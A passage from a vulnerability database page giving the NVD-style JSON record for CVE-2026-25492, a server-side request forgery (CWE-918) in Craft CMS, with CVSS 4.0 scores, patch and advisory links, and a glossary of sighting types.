          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "LOW",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-09T20:15:57.650",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/craftcms/cms/releases/tag/5.8.22"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25492 (GCVE-0-2026-25492)

GHSA-96PQ-HXPW-RGH8

Summary

Details

PoC

Preconditions

Code

Impact

FKIE_CVE-2026-25492

Tags

Sightings

Nomenclature